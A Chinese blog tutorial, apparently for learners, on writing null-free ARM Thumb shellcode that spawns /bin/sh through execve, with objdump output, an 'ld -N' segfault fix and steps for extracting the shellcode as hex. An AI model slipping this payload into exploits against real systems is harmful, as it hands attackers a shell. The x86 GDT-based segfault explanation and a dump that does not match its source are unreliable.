ARM实战前的准备 :

最新推荐文章于 2022-11-05 18:08:39 发布
最新推荐文章于 2022-11-05 18:08:39 发布
阅读量204 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/github_38641765/article/details/86580423
版权

实战前的准备

  • strace:跟踪程序调用的系统函数
  • 系统调用号:系统函数的调用标号。例如:grep write /usr/include/arm-linux-gnueabihf/asm/unistd.h
  • 查找系统函数调用时需要的参数:w3calls
  • objdump:检查反汇编程序中的空字节

ARM指令详细介绍https://sourceware.org/binutils/docs-2.31/as/index.html

.data    @告诉汇编器,下面的内容是数据段
output_string: .asciz "i am a hacker!\n"    @.asciz:字符串结尾为空字节
after_string:
.set size_of_string, after_string-output_string


.text    @告诉汇编器,下面的内容是代码段
.global _start    @声明全局助记符

_start:
 mov r0,#1
 ldr r1,addr_output_string
 mov r2,#size_of_string
 mov r7,#4
 swi #0    @调用系统调用号4,即write函数

 mov r7,#1
 swi 0    @exit

addr_output_string: .word output_string
addr_after_string: .word after_string
实现没有空字符的汇编代码
.global _start

.text

_start:
 .code 32        @告诉编译器,下面的代码是32位指令
 add r3,pc,#1
 bx r3

 .code 16        @告诉编译器,下面的代码是16位指令
 add r0,pc,#8
 eor r1,r1,r1
 eor r2,r2,r2
 mov r7,#11
 svc #1        @调用系统函数
 mov r5, r5    @保证指令都是4字节对齐
.ascii "/bin/sh\0"

反编译后还是存在null字符,当然肯定比32位的汇编程序少多了,现在我们需要继续去除剩余的空字符,保证shellcode的完整性
先使用as生成.o文件as execve.s -o execve.o,然后objdump -d execve.o反汇编程序

0: e28f3001 add r3, pc, #1
4: e12fff13 bx r3
8: a002 add r0, pc, #8 ; (adr r0, 14 <_start+0x14>)
a: 4049 eors r1, r1
c: 4052 eors r2, r2
e: 270b movs r7, #11
10: df01 svc 1
12: 1c2d adds r5, r5, #0
14: 6e69622f .word 0x6e69622f
18: 7361622f .word 0x7361622f
1c: 46c00068 .word 0x46c00068

增加一个行字符替换指令,减少了一行保证指令缩进的误用误用指令

.global _start
.text
_start:
.code 32
add r3,pc,#1
bx r3
.code 16
add r0,pc,#8
eor r1,r1,r1
eor r2,r2,r2
strb r2,[r0, #7]
mov r7,#11
svc #1
.ascii "/bin/shx"

结果:不再有空字符

00000000 <_start>:
0: e28f3001 add r3, pc, #1
4: e12fff13 bx r3
8: a002 add r0, pc, #8 ; (adr r0, 14 <_start+0x14>)
a: 4049 eors r1, r1
c: 4052 eors r2, r2
e: 71c2 strb r2, [r0, #7]
10: 270b movs r7, #11
12: df01 svc 1
14: 6e69622f .word 0x6e69622f
18: 7868732f .word 0x7868732f

Segmentation fault

代码

.global _start

.text

_start:
 .code 32
 add r3,pc,#1
 bx r3

 .code 16
 add r0,pc,#8
 eor r1,r1,r1
 eor r2,r2,r2
 strb r2,[r0, #7]
 mov r7,#11
 svc #1
.ascii "/bin/shx"

as execve.s -o execve.o && ld execve.o -o execve然后执行./execve会出现错误Segmentation fault

所谓的段错误就是指访问的内存超过了系统所给这个程序的内存空间,通常这个值是由gdtr来保存的,他是一个48位的寄存器,其中的32位是保存由它指向的gdt表,后13位保存相应于gdt的下标,最后3位包括了程序是否在内存中以及程序的在cpu中的运行级别,指向的gdt是由以64位为一个单位的表,在这张表中就保存着程序运行的代码段以及数据段的起始地址以及相应的断限和页面交换还有程序运行级别和内存粒度等信息,一旦一个程序发生了越界访问,CPU就会产生相应的异常保护,于是segmentation fault就出现了

原文:https://blog.csdn.net/u010150046/article/details/77775114

根据gdb调试,运行到 strb r2,[r0, #7]这条指令时会出错,明显是它访问了不可访问内存数据

解决方法:as execve.s -o execve.o && ld -N execve.o -o execve,让生成的程序的数据可读

ld --help
....
  -N, --omagic                不要页面对齐数据, 让代码不是只读
...

将shellcode十六进制化

objcopy:复制二进制文件,并在过程中对其进行改变。从ELF二进制文件中提取原始shellcode

  1. 先从elf二进制文件中提取原始shellcode
    objcopy -O <ELF文件> <输出的原始shellcode文件>

  2. 将shellcode 转成十六进制
    (1) hexdump -v -e '"\\""x" 1/1 "%02x" ""' <原始shellcode文件>
    (2)python脚本

#!/usr/bin/env python

import sys

binary = open(sys.argv[1],'rb')

for byte in binary.read():
 sys.stdout.write("\\x"+byte.encode("hex"))

print ""
Dr. 熊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux arm mmu基础
xiaojsj111的专栏
09-05 2万+
先上一张linux arm mmu的页表结构的框图:
ARM从零基础到入门--告诉你这10天我都做了些什么--小白历险记--ARM之旅
明何
04-23 9145
如果你只懂得linux,知道它有一个终端,而且只知道两个命令,cd和ls,那恭喜你,你看这个文章的时候和我最开始做这个ARM的东西的时候基础差不多。 如果你想学学ARM,但是不知道中间会遇到什么问题,要怎么办?那也恭喜你,这边文章很可能会有你以后遇到的问题的情况 如果你想知道具体问题怎么解决,那还是恭喜你,这篇文章一点都没说,然后你可能会问,那这篇文章有什么用?我告诉你,多动手,多动脑,脸厚,
汇编精讲02
qq_41962968的博客
11-05 2510
超过4个变量的参数专递一般将额外的变量压入栈内存。32位机器push和pop的字节数一般为4。
ARM开发(三)ARM寻址方式,异常中断,异常向量表
fuyuyf的博客
08-09 1556
ARM寻址方式,异常中断,异常向量表
ARM指令集
嵌入式与人工智能
10-26 1523
ARM指令集1.ARM指令集.2.ARM 指令列表:3.分类详解 1.ARM指令集. 是指计算机ARM操作指令系统。在ARM中有两种方式可以实现程序的跳转:一种是跳转指令;另一种是直接向PC寄存器(R15)中写入目标地址值。 ARM指令集可以分为跳转指令、数据处理指令、程序状态寄存器(PSR)处理指令、加载/存储指令、协处理器指令和异常产生指令六大类。 2.ARM 指令列表: ADC 带进位的32位数加法 ADD 32位数相加 AND 32位数的逻辑与 B 在32M空间内的相对跳转指令 BEQ 相等则跳转
全局描述符表(GDT)——《x86汇编语言:从实模式到保护模式》读书笔记09
weixin_30849403的博客
01-09 519
在进入保护模式之,我们先要学习一些基础知识。今天我们看一下全局描述符表(Global Descriptor Table, 简称GDT)。 同实模式一样,在保护模式下,对内存的访问仍然使用段地址加偏移地址。但是,在保护模式下,在每个段能够访问之,必须先登记。这就好比像C语言中,“对变量的使用必须先定义”一样。 每个段在能够使用之,都要为这个段建立一个描述符。每个描述符占8个字节,这...
Linux ARM 驱动笔记之一 : 准备
Imeng的专栏
10-09 1499
Linux ARM 驱动笔记之一 : 准备     本文以Linux ARMSPI设备驱动为例记录Linux驱动的开发中的一些套路和准备.本文内容抛开具体代码,描述相关的准备知识,描述书本中很少提及的内容.     1 驱动编写的套路 Linux 驱动编写归根揭底,涉及到底部,就是设置寄存器, 从设置寄存器的角度来看,Linux驱动编写分为两种套路: 1)     直接操控寄存器:
ARM平台OpenCV移植实战:5步构建高性能图像处理系统
[ARM平台OpenCV移植实战:5步构建高性能图像处理系统](https://imagepphcloud.thepaper.cn/pph/image/230/769/634.jpg) # 1. OpenCV简介及ARM平台移植基础** OpenCV(Open Source Computer Vision Library)是一个...
linux项目实战:视频监控项目资源
12-28
在本Linux项目实战中,我们将聚焦于视频监控系统的构建与管理。这个项目资源包主要包含了一个名为"5buildroot"的文件,这通常意味着我们将会使用Buildroot工具来配置和构建一个定制化的嵌入式Linux系统,适用于视频...
嵌入式系统/ARM技术中的嵌入式Linux实战篇--交叉编译环境的建立(基于ubuntu 8.10)
11-12
首先,我们需要准备合适的软硬件环境。主机环境应为Ubuntu 8.10,同时确保安装了特定的软件包,包括Bison、Flex、build-essential、patch以及libncurses5-dev。这些工具是构建交叉编译工具链所必需的,例如Bison和...
迅为iTOP-4412开发板-实战教程-ssh服务器移植到arm开发板
05-15
### 迅为iTOP-4412开发板实战教程:SSH服务器移植到ARM开发板 #### 一、概述 迅为iTOP-4412是一款基于ARM架构的开发板,广泛应用于嵌入式系统的学习与开发之中。在本教程中,我们将详细介绍如何将SSH服务器移植到...
arm cortexA8 实战演练
04-03
标题:"ARM Cortex-A8 实战演练",是一本专注于ARM Cortex-A8处理器实战技术的书籍,涵盖了从基础的裸机开发到高级的系统开发和项目实战的全部过程。 描述:书中详细介绍了ARM Cortex-A8处理器的特点,其应用领域,...
arm linux 中断 分析,armlinux中断异常的处理分析.pdf
weixin_34434843的博客
05-14 121
基于 ARM Linux 中断、异常的处理分析本文是基于ARM S3C2410X 系统的Linux 2.6 中断、异常和系统调用的处理分析。主要有以下几个部分:1. ARM 的硬件中断机制2. Linux 2.6 对 ARM 中断向量表的初始化3. Linux 2.6 对 ARM 中断、异常的处理(从汇编-->C 语言函数;asm_do_IRQ )一、 A...
add r0, pc, #OEMAddressTable-(.+8)指令引起的论坛讨论
gooogleman#foxmail.com
01-06 5827
 作者:wogoyixikexie@gliet    wangxin_801115在昨天发了个帖子,本来觉得很简单,没有想到引起了很大的关注。现在收集起来造福you and me。———————————————————————————————————————————————————add r0, pc, #OEMAddressTable-(.+8) ; (r0) = OEMAddres
屌丝学arm汇编-05-编译器如何利用pc指针生成PIC(位置无关码)
losting_boy的博客
09-03 1009
首先来2个问题 1.编译器如何处理伪指令,例如ldr。首先伪指令不是真实的指令,这样说有些模糊。伪指令的执行者不是arm cpu,而是编译器。这个描述准确点,但是编译器只是把伪 指令做了转化,转化成arm指令,最终还是有arm cpu来执行。在C语言中  #define    TEST    (5 - 3)  这里(5- 3)会由编译器计算好,将结果放到最终生成的执行程序中,一般在code的.
ARM汇编之堆栈溢出实战分析一(GDB)
github_38641765的博客
01-06 2377
转自:安全课传送门 引言 经过很长一段时间在azeria-labs进行的ARM基础汇编学习,学到了很多ARM汇编的基础知识、和简单的shellcode的编写,为了验证自己的学习成果,根据该网站提供的实例,做一次比较详细的逆向分析,和shellcode的实现,为自己的ARM入门学习巩固。 实例下载地址:git clone https://github.com...
在 GNU RADIO(软件定义无线电或 SDR)上实现 OFDM 和 OTFS 收发器
最新发布
08-27
OTFS 和 OFDM 收发器 在 GNU 无线电(软件定义无线电或 SDR)上实现 OFDM 和 OTFS 收发器 OFDM 是一种专用的 FDM,其约束是主信号被划分的子流彼此正交。正交信号是相互垂直的信号。正交信号的一个主要特性是它们不会相互干扰。 OTFS 收发器: 上述收发器在多普勒频移相当高(例如,几千赫兹的多普勒)的高迁移率场景中表现不佳。正交时频空间 (OTFS) 是最近提出的一种无线接入技术波形,在高移动性环境中表现非常好。它是一种二维调制方案,其中信息符号在延迟多普勒域中多路复用。 下面是城市多通道场景中的无线信道示例,说明了与时频表示相比,延迟多普勒表示中信道的稀疏性和缓慢变化性。OTFS 调制利用了信道的延迟多普勒模型的缓慢变化。
ARM嵌入式实验:GPIO控制与接口实战
5. 选择DebugInExram生成目标,编译链接工程,准备进行调试。 6. 调试时,通过调整EasyARM2200开发板上的跳线设置(如JP9和JP4、JP6),管理内存空间。 7. 实验内容涵盖GPIO控制(如蜂鸣器)、模拟SPI、外部中断...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值